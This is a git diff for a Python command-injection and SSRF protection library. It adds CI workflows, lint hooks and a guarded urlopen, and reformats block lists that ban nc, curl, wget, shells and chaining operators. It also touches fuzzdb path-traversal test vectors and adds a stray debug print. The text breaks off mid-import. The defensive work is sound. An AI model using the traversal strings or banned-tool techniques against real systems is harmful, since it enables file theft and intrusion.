diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml new file mode 100644 index 0000000..0f74f75 --- /dev/null +++ b/.github/workflows/lint.yml @@ -0,0 +1,22 @@ +name: Lint + +on: + push: + branches: + - main + pull_request: + branches: + - main + merge_group: + +concurrency: + group: (${{ github.workflow }}-${{ github.event.inputs.branch || github.event.pull_request.head.ref }}) + cancel-in-progress: true + +jobs: + pre-commit: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v5 + - uses: pre-commit/action@v3.0.1 diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 0000000..b7a43bd --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,59 @@ +name: Unit Tests + +on: + push: + branches: + - main + pull_request: + branches: + - main + merge-group: + +concurrency: + group: ${{ github.workflow }}-${{ github.ref }} + cancel-in-progress: true + +jobs: + build: + name: Build Package + runs-on: ubuntu-22.04 + timeout-minutes: 5 + steps: + - name: Check out code + uses: actions/checkout@v4 + - name: Set Up Python + uses: actions/setup-python@v5 + with: + python-version: '3.12' + cache: 'pip' + - name: Install build dependencies + run: pip install build twine + - name: Build package + run: python -m build . + - name: Twine Check + run: twine check dist/* + test: + name: Run pytest + runs-on: ubuntu-22.04 + timeout-minutes: 25 + strategy: + matrix: + python-version: ['3.10', '3.11', '3.12'] + steps: + - name: install netcat + run: apt update && apt install -y netcat + - name: make bash default shell + run: ln -sf /bin/bash /bin/sh + - name: Check out code + uses: actions/checkout@v4 + - name: Set Up Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + cache: 'pip' + - name: Install Codemodder Package + run: pip install . + - name: Install Dependencies + run: pip install -r dev_requirements.txt + - name: Run unit tests + run: pytest diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 87994be..55bd8b6 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -1,6 +1,6 @@ repos: - repo: https://github.com/pre-commit/pre-commit-hooks - rev: v2.3.0 + rev: v4.6.0 hooks: - id: check-yaml - id: check-json @@ -8,6 +8,31 @@ repos: - id: trailing-whitespace - id: check-added-large-files - repo: https://github.com/psf/black - rev: 23.3.0 + rev: 24.4.0 hooks: - id: black +- repo: https://github.com/pre-commit/mirrors-mypy + rev: v1.9.0 + hooks: + - id: mypy + args: [--disable-error-code=has-type,--disable-error-code=import-not-found] + additional_dependencies: + [ + "types-jsonschema~=4.21.0", + "types-mock==5.0.*", + "types-PyYAML==6.0", + "types-toml~=0.10", + "types-requests~=2.13", + ] +- repo: https://github.com/astral-sh/ruff-pre-commit + rev: v0.3.7 + hooks: + - id: ruff + # todo: replace black with this? + # Run the formatter. + # - id: ruff-format +- repo: https://github.com/pycqa/isort + rev: 5.13.2 + hooks: + - id: isort + args: ["--profile", "black"] diff --git a/LICENSE.txt b/LICENSE.txt index 9e88477..99e8671 100644 --- a/LICENSE.txt +++ b/LICENSE.txt @@ -18,4 +18,4 @@ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. \ No newline at end of file +SOFTWARE. diff --git a/MANIFEST.in b/MANIFEST.in index e73397c..046a397 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -1 +1 @@ -include README.md LICENSE.txt \ No newline at end of file +include README.md LICENSE.txt diff --git a/README.md b/README.md index f6b8347..0e8690b 100644 --- a/README.md +++ b/README.md @@ -10,3 +10,11 @@ Many of the APIs provided are meant to be drop-in replacements that either offer To install this package from PyPI, use the following command: `pip install security` + +## Running tests + +DO NOT RUN TESTS LOCALLY WITHOUT A VM/CONTAINER. + +Tests will try to run "dangerous" commands (i.e. curl, netcat, etc.) and try to access sensitive files (i.e. sudoers, passwd, etc.). We do so to test the our abilities to detect and filter these types of attacks. + +While all these commands are devised as innocuous, it is still not a good idea to risk exposure. They also require a specific environment to pass. We recommend using something like [act](https://github.com/nektos/act) to run the github workflow locally within a container for local development. diff --git a/src/security/safe_command/__init__.py b/src/security/safe_command/__init__.py index 1b9a94f..12db160 100644 --- a/src/security/safe_command/__init__.py +++ b/src/security/safe_command/__init__.py @@ -1 +1,3 @@ from .api import call, run + +__all__ = ["call", "run"] diff --git a/src/security/safe_command/api.py b/src/security/safe_command/api.py index 9713de8..93249b7 100644 --- a/src/security/safe_command/api.py +++ b/src/security/safe_command/api.py @@ -1,22 +1,34 @@ import shlex -from re import compile as re_compile -from pathlib import Path from glob import iglob -from os import getenv, get_exec_path, access, X_OK +from os import X_OK, access, get_exec_path, getenv from os.path import expanduser, expandvars +from pathlib import Path +from re import compile as re_compile from shutil import which from subprocess import CompletedProcess -from typing import Union, Optional, List, Tuple, Set, FrozenSet, Sequence, Callable, Iterator +from typing import ( + Callable, + FrozenSet, + Iterator, + List, + Optional, + Sequence, + Set, + Tuple, + Union, +) + from security.exceptions import SecurityException ValidRestrictions = Optional[Union[FrozenSet[str], Sequence[str]]] ValidCommand = Union[str, List[str]] DEFAULT_CHECKS = frozenset( - ("PREVENT_COMMAND_CHAINING", - "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", - "PREVENT_COMMON_EXPLOIT_EXECUTABLES", - ) + ( + "PREVENT_COMMAND_CHAINING", + "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", + "PREVENT_COMMON_EXPLOIT_EXECUTABLES", + ) ) SENSITIVE_FILE_PATHS = frozenset( @@ -34,30 +46,90 @@ ) BANNED_EXECUTABLES = frozenset( - ("nc", "netcat", "ncat", "curl", "wget", "dpkg", "rpm")) + ("nc.openbsd", "nc", "netcat", "ncat", "curl", "wget", "dpkg", "rpm") +) BANNED_PATHTYPES = frozenset( - ("mount", "symlink", "block_device", "char_device", "fifo", "socket")) + ("mount", "symlink", "block_device", "char_device", "fifo", "socket") +) BANNED_OWNERS = frozenset(("root", "admin", "wheel", "sudo")) BANNED_GROUPS = frozenset(("root", "admin", "wheel", "sudo")) BANNED_COMMAND_CHAINING_SEPARATORS = frozenset(("&", ";", "|", "\n")) -BANNED_COMMAND_AND_PROCESS_SUBSTITUTION_OPERATORS = frozenset( - ("$(", "`", "<(", ">(")) -BANNED_COMMAND_CHAINING_EXECUTABLES = frozenset(( - "eval", "exec", "-exec", "env", "source", "sudo", "su", "gosu", "sudoedit", - "xargs", "awk", "perl", "python", "ruby", "php", "lua", "sqlplus", - "expect", "screen", "tmux", "byobu", "byobu-ugraph", "time", - "nohup", "at", "batch", "anacron", "cron", "crontab", "systemctl", "service", "init", "telinit", - "systemd", "systemd-run" -)) -COMMON_SHELLS = frozenset(("sh", "bash", "zsh", "csh", "rsh", "tcsh", "tclsh", "ksh", "dash", "ash", - "jsh", "jcsh", "mksh", "wsh", "fish", "busybox", "powershell", "pwsh", "pwsh-preview", "pwsh-lts")) - -ALLOWED_SHELL_EXPANSION_OPERATORS = frozenset(('-', '=', '?', '+')) -BANNED_SHELL_EXPANSION_OPERATORS = frozenset( - ("!", "*", "@", "#", "%", "/", "^", ",")) - - -def run(original_func: Callable, command: ValidCommand, *args, restrictions: ValidRestrictions = DEFAULT_CHECKS, **kwargs) -> Union[CompletedProcess, None]: +BANNED_COMMAND_AND_PROCESS_SUBSTITUTION_OPERATORS = frozenset(("$(", "`", "<(", ">(")) +BANNED_COMMAND_CHAINING_EXECUTABLES = frozenset( + ( + "eval", + "exec", + "-exec", + "env", + "source", + "sudo", + "su", + "gosu", + "sudoedit", + "xargs", + "awk", + "perl", + "python", + "ruby", + "php", + "lua", + "sqlplus", + "expect", + "screen", + "tmux", + "byobu", + "byobu-ugraph", + "time", + "nohup", + "at", + "batch", + "anacron", + "cron", + "crontab", + "systemctl", + "service", + "init", + "telinit", + "systemd", + "systemd-run", + ) +) +COMMON_SHELLS = frozenset( + ( + "sh", + "bash", + "zsh", + "csh", + "rsh", + "tcsh", + "tclsh", + "ksh", + "dash", + "ash", + "jsh", + "jcsh", + "mksh", + "wsh", + "fish", + "busybox", + "powershell", + "pwsh", + "pwsh-preview", + "pwsh-lts", + ) +) + +ALLOWED_SHELL_EXPANSION_OPERATORS = frozenset(("-", "=", "?", "+")) +BANNED_SHELL_EXPANSION_OPERATORS = frozenset(("!", "*", "@", "#", "%", "/", "^", ",")) + + +def run( + original_func: Callable, + command: ValidCommand, + *args, + restrictions: ValidRestrictions = DEFAULT_CHECKS, + **kwargs, +) -> Union[CompletedProcess, None]: # If there is a command and it passes the checks pass it the original function call check(command, restrictions, **kwargs) return _call_original(original_func, command, *args, **kwargs) @@ -66,14 +138,18 @@ def run(original_func: Callable, command: ValidCommand, *args, restrictions: Val call = run -def _call_original(original_func: Callable, command: ValidCommand, *args, **kwargs) -> Union[CompletedProcess, None]: +def _call_original( + original_func: Callable, command: ValidCommand, *args, **kwargs +) -> Union[CompletedProcess, None]: return original_func(command, *args, **kwargs) -def _get_env_var_value(var: str, venv: Optional[dict] = None, default: Optional[str] = None) -> str: +def _get_env_var_value( + var: str, venv: Optional[dict] = None, default: Optional[str] = None +) -> str: """ Try to get the value of the environment variable var. - First check the venv if it is provided and the variable is set. + First check the venv if it is provided and the variable is set. then check for a value with os.getenv then with os.path.expandvars. Returns an empty string if the variable is not set. """ @@ -83,7 +159,7 @@ def _get_env_var_value(var: str, venv: Optional[dict] = None, default: Optional[ return value # Try os.getenv first - if (value := getenv(var)): + if value := getenv(var): return value if not var.startswith("$"): @@ -116,7 +192,9 @@ def _replace_all(string: str, replacements: dict, reverse=False) -> str: return string -def _simple_shell_math(expression: Union[str, Iterator[str]], venv: dict, operator: str = '+') -> int: +def _simple_shell_math( + expression: Union[str, Iterator[str]], venv: dict, operator: str = "+" +) -> int: """ Handles arithmetic expansion of bracket paramters like ${HOME:1+1:5-2} == ${HOME:2:3} Only supports + - for now since * / % are banned shell expansion operators @@ -129,7 +207,7 @@ def _simple_shell_math(expression: Union[str, Iterator[str]], venv: dict, operat ALLOWED_OPERATORS = "+-" def is_valid_shell_number(string: str) -> bool: - return string.lstrip('+-').replace(".", "", 1).isnumeric() + return string.lstrip("+-").replace(".", "", 1).isnumeric() def is_operator(char: str) -> bool: return char in ALLOWED_OPERATORS @@ -142,7 +220,7 @@ def evaluate_stack(stack: list, venv: dict) -> float: return 0 # Join items in the stack to form a string for evaluation - stack_str = ''.join(stack) + stack_str = "".join(stack) # If the stack is a number return it if is_valid_shell_number(stack_str): @@ -163,20 +241,20 @@ def evaluate_stack(stack: list, venv: dict) -> float: raise ValueError("Invalid arithmetic expansion") # Main function body - value = 0 - stack = [] + value = 0.0 + stack: list[str] = [] char = "" if isinstance(expression, str): # Whitespace is ignored when evaluating the expression - expression = expression.replace(' ', "").replace( - "\t", "").replace("\n", "") + expression = expression.replace(" ", "").replace("\t", "").replace("\n", "") # Raise an error if the last char in the expression is an operator last_char = expression[-1] if expression else "" if last_char and (is_operator(last_char) or is_assignment_operator(last_char)): raise ValueError( - f"Invalid arithmetic expansion. operand expected (error token is '{last_char}')") + f"Invalid arithmetic expansion. operand expected (error token is '{last_char}')" + ) if expression.startswith("-"): operator = "-" @@ -193,7 +271,7 @@ def evaluate_stack(stack: list, venv: dict) -> float: expr_iter = expression # Recursively evaluate the expression until the iterator is exhausted - while (char := next(expr_iter, "")): + while char := next(expr_iter, ""): did_lookahead = False if is_operator(char): @@ -216,10 +294,9 @@ def evaluate_stack(stack: list, venv: dict) -> float: char = next_char if is_assignment_operator(char): - var = ''.join(stack) + var = "".join(stack) if not var: - raise ValueError( - "Invalid arithmetic expansion. variable expected") + raise ValueError("Invalid arithmetic expansion. variable expected") # Recursively evaluate the expression after the assignment operator assignment_value = _simple_shell_math(expr_iter, venv, operator) @@ -230,8 +307,7 @@ def evaluate_stack(stack: list, venv: dict) -> float: # Set the variable to the evaluated value depending on whether it was an assignment or an increment if did_lookahead: # Increment the variable by the assignment value - venv[var] = str( - int(float(venv.get(var, 0)) + assignment_value)) + venv[var] = str(int(float(venv.get(var, 0)) + assignment_value)) else: # Set the variable to the assignment value venv[var] = str(assignment_value) @@ -256,14 +332,14 @@ def evaluate_stack(stack: list, venv: dict) -> float: def _shell_expand(command: str, venv: Optional[dict] = None) -> str: """ Expand shell variables and shell expansions in the command string. - Implementation is based on Bash expansion rules: + Implementation is based on Bash expansion rules: https://www.gnu.org/software/bash/manual/html_node/Shell-Expansions.html """ PARAM_EXPANSION_REGEX = re_compile( - r'(?P\$(?P[a-zA-Z_][a-zA-Z0-9_]*|\{[^{}\$]+?\}))') - BRACE_EXPANSION_REGEX = re_compile( - r'(?P\S*(?P\{[^{}\$]+?\})\S*)') + r"(?P\$(?P[a-zA-Z_][a-zA-Z0-9_]*|\{[^{}\$]+?\}))" + ) + BRACE_EXPANSION_REGEX = re_compile(r"(?P\S*(?P\{[^{}\$]+?\})\S*)") # To store {placeholder : invalid_match} pairs to reinsert after the loop invalid_matches = {} @@ -273,10 +349,15 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: # since it is not always returned correctly by os.getenv or os.path.expandvars on all systems venv["IFS"] = _get_env_var_value("IFS", venv, default=" ") - while (match := (PARAM_EXPANSION_REGEX.search(command) or BRACE_EXPANSION_REGEX.search(command))): + while match := ( + PARAM_EXPANSION_REGEX.search(command) or BRACE_EXPANSION_REGEX.search(command) + ): full_expansion, content = match.groups() - inside_braces = content[1:-1] if content.startswith( - "{") and content.endswith("}") else content + inside_braces = ( + content[1:-1] + if content.startswith("{") and content.endswith("}") + else content + ) if match.re is PARAM_EXPANSION_REGEX: # Handles Parameter expansion ${var:1:2}, ${var:1}, ${var:1:}, ${var:1:2:3} @@ -288,7 +369,8 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: for banned_expansion_operator in BANNED_SHELL_EXPANSION_OPERATORS: if banned_expansion_operator in inside_braces: raise SecurityException( - f"Disallowed shell expansion operator: {banned_expansion_operator}") + f"Disallowed shell expansion operator: {banned_expansion_operator}" + ) var, *expansion_params = inside_braces.split(":") @@ -299,22 +381,27 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: # If the first char is empty or a digit or a space then it is a slice expansion # like ${var:1:2}, ${var:1}, ${var:1:}, ${var:1:2:3} ${var: -1} ${var:1+1:5-2} ${var::} - if not expansion_param_1 or expansion_param_1[0].isalnum() or expansion_param_1[0] == " ": + if ( + not expansion_param_1 + or expansion_param_1[0].isalnum() + or expansion_param_1[0] == " " + ): try: - start_slice = _simple_shell_math( - expansion_param_1, venv) + start_slice = _simple_shell_math(expansion_param_1, venv) if len(expansion_params) > 1: expansion_param_2 = expansion_params[1] - end_slice = _simple_shell_math( - expansion_param_2, venv) + end_slice = _simple_shell_math(expansion_param_2, venv) except ValueError as e: raise SecurityException( - f"Invalid arithmetic in shell expansion: {e}") + f"Invalid arithmetic in shell expansion: {e}" + ) - elif (operator := expansion_param_1[0]) in ALLOWED_SHELL_EXPANSION_OPERATORS: + elif ( + operator := expansion_param_1[0] + ) in ALLOWED_SHELL_EXPANSION_OPERATORS: # If the first char is a shell expansion operator then it is a default value expansion # like ${var:-defaultval}, ${var:=defaultval}, ${var:+defaultval}, ${var:?defaultval} - default = ':'.join(expansion_params)[1:] + default = ":".join(expansion_params)[1:] value = _get_env_var_value(var, venv, default="") if start_slice is not None: @@ -342,21 +429,26 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: } # Docs state: "A { or ‘,’ may be quoted with a backslash to prevent its being considered part of a brace expression." inside_braces_no_escapes = _replace_all( - inside_braces, escape_placeholders, reverse=True) + inside_braces, escape_placeholders, reverse=True + ) - if ',' in inside_braces_no_escapes and inside_braces_no_escapes.count("{") == inside_braces_no_escapes.count("}"): + if "," in inside_braces_no_escapes and inside_braces_no_escapes.count( + "{" + ) == inside_braces_no_escapes.count("}"): # Brace expansion - for var in inside_braces_no_escapes.split(','): + for var in inside_braces_no_escapes.split(","): var = _replace_all(var, escape_placeholders) - item = full_expansion.replace( - content, _strip_quotes(var), 1) + item = full_expansion.replace(content, _strip_quotes(var), 1) values.append(item) - elif len(seq_params := inside_braces.split('..')) in (2, 3): + elif len(seq_params := inside_braces.split("..")) in (2, 3): # Sequence expansion start, end = seq_params[:2] - if start.replace("-", "", 1).isdigit() and end.replace("-", "", 1).isdigit(): + if ( + start.replace("-", "", 1).isdigit() + and end.replace("-", "", 1).isdigit() + ): # Numeric sequences start, end = int(start), int(end) step = int(seq_params[2]) if len(seq_params) == 3 else 1 @@ -366,9 +458,9 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: # Alphanumeric sequences start, end = ord(start), ord(end) step = 1 - format_fn = chr + format_fn = chr # type: ignore # Step is not allowed for character sequences - valid_sequence = (len(seq_params) == 2) + valid_sequence = len(seq_params) == 2 else: # Invalid sequences start, end, step = 0, 0, 0 @@ -376,20 +468,22 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: if valid_sequence: if start <= end and step > 0: - sequence = range(start, end+1, step) + sequence = list(range(start, end + 1, step)) elif start <= end and step < 0: - sequence = range(end-1, start-1, step) + sequence = list(range(end - 1, start - 1, step)) elif start > end and step > 0: - sequence = range(start, end-1, -step) + sequence = list(range(start, end - 1, -step)) elif start > end and step < 0: - sequence = reversed(range(start, end-1, step)) + sequence = list(reversed(range(start, end - 1, step))) else: # When syntax is valid but step is 0 the sequence is just the value inside the braces so the expansion is replaced with the value - sequence = [inside_braces] + sequence = [inside_braces] # type: ignore # Apply the format function (str or chr) to each int in the sequence - values.extend(full_expansion.replace( - content, format_fn(i), 1) for i in sequence) + values.extend( + full_expansion.replace(content, format_fn(i), 1) # type: ignore + for i in sequence + ) else: # Replace invalid expansion to prevent infinite loop (from matching again) and store the content to reinsert after the loop @@ -398,7 +492,7 @@ def _shell_expand(command: str, venv: Optional[dict] = None) -> str: values.append(full_expansion.replace(content, placeholder)) # Replace the full expansion with the expanded values - value = ' '.join(values) + value = " ".join(values) command = command.replace(full_expansion, value, 1) # Reinsert invalid matches after the loop exits @@ -413,8 +507,9 @@ def _space_redirection_operators(command: str) -> str: https://www.gnu.org/software/bash/manual/html_node/Redirections.html """ REDIRECTION_OPERATORS_REGEX = re_compile( - r'(?![<>]+\()(<>?&?-?(?:\d+|\|)?|<>)') - return REDIRECTION_OPERATORS_REGEX.sub(r' \1 ', command) + r"(?![<>]+\()(<>?&?-?(?:\d+|\|)?|<>)" + ) + return REDIRECTION_OPERATORS_REGEX.sub(r" \1 ", command) def _recursive_shlex_split(command: str) -> Iterator[str]: @@ -431,7 +526,9 @@ def _recursive_shlex_split(command: str) -> Iterator[str]: yield from _recursive_shlex_split(cmd_part) -def _parse_command(command: ValidCommand, venv: Optional[dict] = None, shell: Optional[bool] = True) -> Tuple[str, List[str]]: +def _parse_command( + command: ValidCommand, venv: Optional[dict] = None, shell: Optional[bool] = True +) -> Tuple[str, List[str]]: """ Expands the shell exspansions in the command then parses the expanded command into a list of command parts. """ @@ -447,8 +544,7 @@ def _parse_command(command: ValidCommand, venv: Optional[dict] = None, shell: Op return ("", []) spaced_command = _space_redirection_operators(command_str) - expanded_command = _shell_expand( - spaced_command, venv) if shell else spaced_command + expanded_command = _shell_expand(spaced_command, venv) if shell else spaced_command parsed_command = list(_recursive_shlex_split(expanded_command)) return expanded_command, parsed_command @@ -457,27 +553,33 @@ def _path_is_executable(path: Path) -> bool: return access(path, X_OK) -def _resolve_executable_path(executable: Optional[str], venv: Optional[dict] = None) -> Optional[Path]: +def _resolve_executable_path( + executable: Optional[str], venv: Optional[dict] = None +) -> Optional[Path]: """ Try to resolve the path of the executable using the which command and the system PATH. """ - if not executable: - return None # Return None if the executable is not set so does not resolve to /usr/local/bin - - if executable_path := which(executable, path=venv.get("PATH") if venv is not None else None): - return Path(executable_path).resolve() + if executable: + if executable_path_str := which( + executable, path=venv.get("PATH") if venv is not None else None + ): + return Path(executable_path_str).resolve() - # Explicitly check if the executable is in the system PATH or absolute when which fails - for path in [""] + get_exec_path(env=venv if venv is not None else None): - if (executable_path := Path(path) / executable).exists() and _path_is_executable(executable_path): - return executable_path.resolve() + # Explicitly check if the executable is in the system PATH or absolute when which fails + for path in [""] + get_exec_path(env=venv if venv is not None else None): + if ( + executable_path := Path(path) / executable + ).exists() and _path_is_executable(executable_path): + return executable_path.resolve() return None -def _resolve_paths_in_parsed_command(parsed_command: List[str], venv: Optional[dict] = None) -> Tuple[Set[Path], Set[str]]: +def _resolve_paths_in_parsed_command( + parsed_command: List[str], venv: Optional[dict] = None +) -> Tuple[Set[Path], Set[str]]: """ - Create Path objects from the parsed commands and resolve symlinks then add to sets of unique Paths + Create Path objects from the parsed commands and resolve symlinks then add to sets of unique Paths and absolute path strings for comparison with the sensitive files, common exploit executables and group/owner checks. """ @@ -496,14 +598,14 @@ def _resolve_paths_in_parsed_command(parsed_command: List[str], venv: Optional[d # Handle any globbing characters and repeating slashes from the command and resolve symlinks to get absolute path for path in iglob(cmd_part, recursive=True): - path = Path(path) + actual_path = Path(path) # When its a symlink both the absolute path of the symlink # and the resolved path of its target are added to the sets - if path.is_symlink(): - path = path.absolute() - abs_paths.add(path) - abs_path_strings.add(str(path)) + if actual_path.is_symlink(): + actual_path = actual_path.absolute() + abs_paths.add(actual_path) + abs_path_strings.add(path) abs_path = Path(path).resolve() abs_paths.add(abs_path) @@ -535,7 +637,12 @@ def check(command: ValidCommand, restrictions: ValidRestrictions, **kwargs) -> N # Check if the executable is set by the Popen kwargs (either executable or shell) # Executable takes precedence over shell. see subprocess.py line 1593 executable_path = _resolve_executable_path(kwargs.get("executable"), venv) - shell = executable_path.name in COMMON_SHELLS if executable_path else kwargs.get("shell") + print(executable_path) + shell = ( + executable_path.name in COMMON_SHELLS + if executable_path + else kwargs.get("shell") + ) expanded_command, parsed_command = _parse_command(command, venv, shell) if not parsed_command: @@ -546,8 +653,7 @@ def check(command: ValidCommand, restrictions: ValidRestrictions, **kwargs) -> N if not executable_path: executable_path = _resolve_executable_path(parsed_command[0], venv) - abs_paths, abs_path_strings = _resolve_paths_in_parsed_command( - parsed_command, venv) + abs_paths, abs_path_strings = _resolve_paths_in_parsed_command(parsed_command, venv) if "PREVENT_COMMAND_CHAINING" in restrictions: check_multiple_commands(expanded_command, parsed_command) @@ -578,22 +684,27 @@ def check(command: ValidCommand, restrictions: ValidRestrictions, **kwargs) -> N def check_multiple_commands(expanded_command: str, parsed_command: List[str]) -> None: # Since shlex.split removes newlines from the command, it would not be present in the parsed_command and # must be checked for in the expanded command string - if '\n' in expanded_command: - raise SecurityException( - "Multiple commands not allowed. Newline found.") + if "\n" in expanded_command: + raise SecurityException("Multiple commands not allowed. Newline found.") for cmd_part in parsed_command: - if any(seperator in cmd_part for seperator in BANNED_COMMAND_CHAINING_SEPARATORS): - raise SecurityException( - f"Multiple commands not allowed. Separators found.") + if any( + seperator in cmd_part for seperator in BANNED_COMMAND_CHAINING_SEPARATORS + ): + raise SecurityException("Multiple commands not allowed. Separators found.") - if any(substitution_op in cmd_part for substitution_op in BANNED_COMMAND_AND_PROCESS_SUBSTITUTION_OPERATORS): + if any( + substitution_op in cmd_part + for substitution_op in BANNED_COMMAND_AND_PROCESS_SUBSTITUTION_OPERATORS + ): raise SecurityException( - f"Multiple commands not allowed. Process substitution operators found.") + "Multiple commands not allowed. Process substitution operators found." + ) if cmd_part.strip() in BANNED_COMMAND_CHAINING_EXECUTABLES | COMMON_SHELLS: raise SecurityException( - f"Multiple commands not allowed. Executable {cmd_part} allows command chaining.") + f"Multiple commands not allowed. Executable {cmd_part} allows command chaining." + ) def check_sensitive_files(expanded_command: str, abs_path_strings: Set[str]) -> None: @@ -601,12 +712,15 @@ def check_sensitive_files(expanded_command: str, abs_path_strings: Set[str]) -> # First check the absolute path strings for the sensitive files # Then handle edge cases when a sensitive file is part of a command but the path could not be resolved if ( - any(abs_path_string.endswith(sensitive_path) - for abs_path_string in abs_path_strings) + any( + abs_path_string.endswith(sensitive_path) + for abs_path_string in abs_path_strings + ) or sensitive_path in expanded_command ): raise SecurityException( - f"Disallowed access to sensitive file: {sensitive_path}") + f"Disallowed access to sensitive file: {sensitive_path}" + ) def check_banned_executable(expanded_command: str, abs_path_strings: Set[str]) -> None: @@ -614,32 +728,34 @@ def check_banned_executable(expanded_command: str, abs_path_strings: Set[str]) - # First check the absolute path strings for the banned executables # Then handle edge cases when a banned executable is part of a command but the path could not be resolved if ( - any((abs_path_string.endswith( - f"/{banned_executable}") for abs_path_string in abs_path_strings)) + any( + ( + abs_path_string.endswith(f"/{banned_executable}") + for abs_path_string in abs_path_strings + ) + ) or expanded_command.startswith(f"{banned_executable} ") or f"bin/{banned_executable}" in expanded_command or f" {banned_executable} " in expanded_command ): - raise SecurityException( - f"Disallowed command: {banned_executable}") + raise SecurityException(f"Disallowed command: {banned_executable}") def check_path_type(path: Path) -> None: for pathtype in BANNED_PATHTYPES: if getattr(path, f"is_{pathtype}")(): raise SecurityException( - f"Disallowed access to path type {pathtype}: {path}") + f"Disallowed access to path type {pathtype}: {path}" + ) def check_file_owner(path: Path) -> None: owner = path.owner() if owner in BANNED_OWNERS: - raise SecurityException( - f"Disallowed access to file owned by {owner}: {path}") + raise SecurityException(f"Disallowed access to file owned by {owner}: {path}") def check_file_group(path: Path) -> None: group = path.group() if group in BANNED_GROUPS: - raise SecurityException( - f"Disallowed access to file owned by {group}: {path}") + raise SecurityException(f"Disallowed access to file owned by {group}: {path}") diff --git a/src/security/safe_requests/__init__.py b/src/security/safe_requests/__init__.py index 18f4678..e7bb53d 100644 --- a/src/security/safe_requests/__init__.py +++ b/src/security/safe_requests/__init__.py @@ -1 +1,3 @@ -from .api import get, post +from .api import get, post, urlopen + +__all__ = ["get", "post", "urlopen"] diff --git a/src/security/safe_requests/api.py b/src/security/safe_requests/api.py index f962b17..826e1a2 100644 --- a/src/security/safe_requests/api.py +++ b/src/security/safe_requests/api.py @@ -1,7 +1,12 @@ -from .host_validators import DefaultHostValidator -from security.exceptions import SecurityException -from requests import get as unsafe_get, post as unsafe_post from urllib.parse import urlparse +from urllib.request import urlopen as unsafe_urlopen + +from requests import get as unsafe_get +from requests import post as unsafe_post + +from security.exceptions import SecurityException + +from .host_validators import DefaultHostValidator DEFAULT_PROTOCOLS = frozenset(("http", "https")) @@ -32,6 +37,19 @@ def _check_host(self, host_validator): raise SecurityException("Disallowed host: %s", self.host) +def urlopen( + url, + data=None, + timeout=None, + *args, + allowed_protocols=DEFAULT_PROTOCOLS, + host_validator=DefaultHostValidator, + **kwargs, +): + UrlParser(url).check(allowed_protocols, host_validator) + return unsafe_urlopen(url, data, timeout, *args, **kwargs) + + def get( url, params=None, diff --git a/tests/conftest.py b/tests/conftest.py index c690119..780a920 100644 --- a/tests/conftest.py +++ b/tests/conftest.py @@ -1,5 +1,5 @@ -import pytest import mock +import pytest @pytest.fixture(autouse=True, scope="module") diff --git a/tests/safe_command/fuzzdb/_copyright.txt b/tests/safe_command/fuzzdb/_copyright.txt index 28ebfdf..8590cb7 100644 --- a/tests/safe_command/fuzzdb/_copyright.txt +++ b/tests/safe_command/fuzzdb/_copyright.txt @@ -55,4 +55,3 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - diff --git a/tests/safe_command/fuzzdb/traversals-8-deep-exotic-encoding.txt b/tests/safe_command/fuzzdb/traversals-8-deep-exotic-encoding.txt index b7feae0..17885be 100644 --- a/tests/safe_command/fuzzdb/traversals-8-deep-exotic-encoding.txt +++ b/tests/safe_command/fuzzdb/traversals-8-deep-exotic-encoding.txt @@ -528,4 +528,4 @@ These test vectors were taken from the fuzzdb project under the terms of the lic /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} /%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} /%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} \ No newline at end of file +/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE} diff --git a/tests/safe_command/test_api.py b/tests/safe_command/test_api.py index 0edf217..39c2982 100644 --- a/tests/safe_command/test_api.py +++ b/tests/safe_command/test_api.py @@ -1,8 +1,10 @@ +import subprocess + import mock import pytest -import subprocess -from security.exceptions import SecurityException + from security import safe_command +from security.exceptions import SecurityException @pytest.mark.parametrize("original_func", [subprocess.run, subprocess.call]) diff --git a/tests/safe_command/test_injection.py b/tests/safe_command/test_injection.py index 2a4cf14..e9a3454 100644 --- a/tests/safe_command/test_injection.py +++ b/tests/safe_command/test_injection.py @@ -1,17 +1,30 @@ -import pytest import subprocess +from os import getenv, mkfifo, remove, symlink from pathlib import Path -from os import mkfifo, symlink, remove, 